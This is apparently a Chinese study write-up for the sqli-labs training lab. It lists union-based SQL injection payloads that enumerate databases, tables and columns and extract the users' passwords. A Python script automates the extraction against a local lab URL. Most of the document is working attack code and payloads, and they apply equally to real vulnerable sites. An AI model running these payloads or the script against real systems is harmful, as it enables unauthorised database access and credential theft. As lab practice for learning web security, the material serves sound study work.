sqli-labs-master(聯合注入自動化腳本獲取數據)

字符型與數字型所使用的payload有所不同，但是大同小異，注意總結

一、獲取字段數和可插入位置：

id=1' order by 3--+
id=-1' union select 1,2,3 --+

二、獲取當前數據庫、當前用戶以及所有數據庫名

#獲取當前數據庫
id=-1' union select 1,2,database() --+
#獲取當前用戶
id=-1' union select 1,2,user() --+
#獲取所有數據庫名
id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

三、獲取表名

id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

四、獲取字段名和數據

#獲取字段名
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
#獲取字段數據
id=-1' union select 1,2,group_concat(password) from security.users--+

聯合注入比較簡單實現，可根據規則寫腳本自動獲取數據，本人也寫了一份，大家做做參考，代碼：

'''Get data'''
def get_data(target_url,payload):
    html_content = requests.get(target_url + payload).text
    result = re.findall(r"Password:(.+?)</",html_content)
    if len(result) > 0 :
        return result


'''Get databases name'''
def get_databse_name(target_url):
    all_databse_payload = "?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+"
    current_database_payload = "?id=-1' union select 1,2,database() --+"
    database_name_list = get_data(target_url,all_databse_payload)
    current_database = get_data(target_url,current_database_payload)
    print('Current database:')
    for item in current_database:
        print(item + ' ')
    print('Exist database name:')
    for item in database_name_list:
        print(item)
    print('*************************************************************************')
    print('\n')


'''Get tables name'''
def get_table_name(target_url):
    database_name = input('Input a database name: ')
    print("Tables name:")
    payload = "?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='%s' --+"%database_name
    table_name_list = get_data(target_url,payload)
    for item in table_name_list:
        print(item)
    print('*************************************************************************')
    print('\n')


def get_column_name(target_url):
    table_name = input('Please input a table name:')
    payload = "?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='%s' --+"%table_name
    column_name_list = get_data(target_url,payload)
    print('Columns name list:')
    for item in column_name_list:
        print(item)
    print('*************************************************************************')
    print('\n')


def get_column_data(target_url):
    database_name = input('Input a database name: ')
    table_name = input('Please input a table name:')
    column_name = input('Please input a column name:')
    payload = "?id=-1' union select 1,2,group_concat(%s) from %s.%s --+"%(column_name,database_name,table_name)
    column_data = get_data(target_url,payload)
    for item in column_data:
        print(item)
    print('*************************************************************************')
    print('\n')


if __name__ == '__main__':
    target_url = 'http://127.0.0.1/sqli-labs-master/Less-1/'
    begin_time = datetime.datetime.now()
    
    print('+----------------------------------------Begin----------------------------------------+')
    get_databse_name(target_url)
    get_table_name(target_url)
    get_column_data(target_url)

    end_time = datetime.datetime.now()
    run_time = (end_time - begin_time).seconds
    print('+-----------------------------------------End-----------------------------------------+')
    print('All mission completed!Cost %s seconds'%run_time)

運行效果:

當遇到盲注類型時可根據特徵進行改改可以繼續使用。